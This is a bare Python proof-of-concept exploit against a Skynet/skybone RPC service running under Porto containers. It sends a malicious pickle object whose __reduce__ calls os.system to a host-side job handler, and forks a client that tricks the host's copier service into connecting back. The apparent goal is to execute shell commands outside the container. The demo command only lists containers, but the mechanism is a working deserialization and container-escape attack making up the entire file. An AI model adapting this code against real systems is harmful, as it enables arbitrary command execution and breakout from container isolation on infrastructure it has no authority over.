#!/skynet/python/bin/python
import os
import logging
import msgpack
import porto
import cPickle
import argparse

from api.skycore import ServiceManager
ServiceManager().get_service_python_api('skynet', 'skybone')

from skybone.rpc.client import RPCClient
from skybone.rpc.server import RPC, Server as RPCServer

class ExecMe(object):
    def __reduce__(self):
        return (os.system, ('portoctl list > {root}/out'.format(root=absolute_root()), ))


def mon(job, subproc):
	data = cPickle.dumps(ExecMe())
	job._RPCJob__conn._Connection__sock.write(msgpack.dumps(('FAILED', job.id, data)))


def absolute_root():
	porto_conn = porto.Connection()
	self_root = porto_conn.GetProperty('self', 'root')
	parent_root = porto_conn.GetProperty('.', 'root')
	return parent_root + self_root

def parse_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('--local-socket', type=str, required=True, help='local unix soket pack')
	parser.add_argument('--host-socket', type=str, required=True, help='host unix soket pack')
	return parser.parse_args()


args = parse_args()

logging.basicConfig()
log = logging.getLogger('poc')
log.setLevel(logging.DEBUG)

rpc = RPC(log)
rpc.mount(mon, typ='full')

rpc_server = RPCServer(log, backlog=10, max_conns=10, unix=args.local_socket)
rpc_server.register_connection_handler(rpc.get_connection_handler())
rpc_server.start()

pid = os.fork()
if pid == 0:
	boneRPC = RPCClient('/Berkanavt/supervisor/var/copier/rbtorrent/rpc.sock', port=None)
	boneRPC.call('runjob', '/Berkanavt/supervisor/skycore/ns/skynet/skybone/bin/skybone-sh', msgpack.dumps({'files':[]}), '--tries=1', '--master-uds', args.host_socket, '--child').wait()
else:
	rpc_server.join()
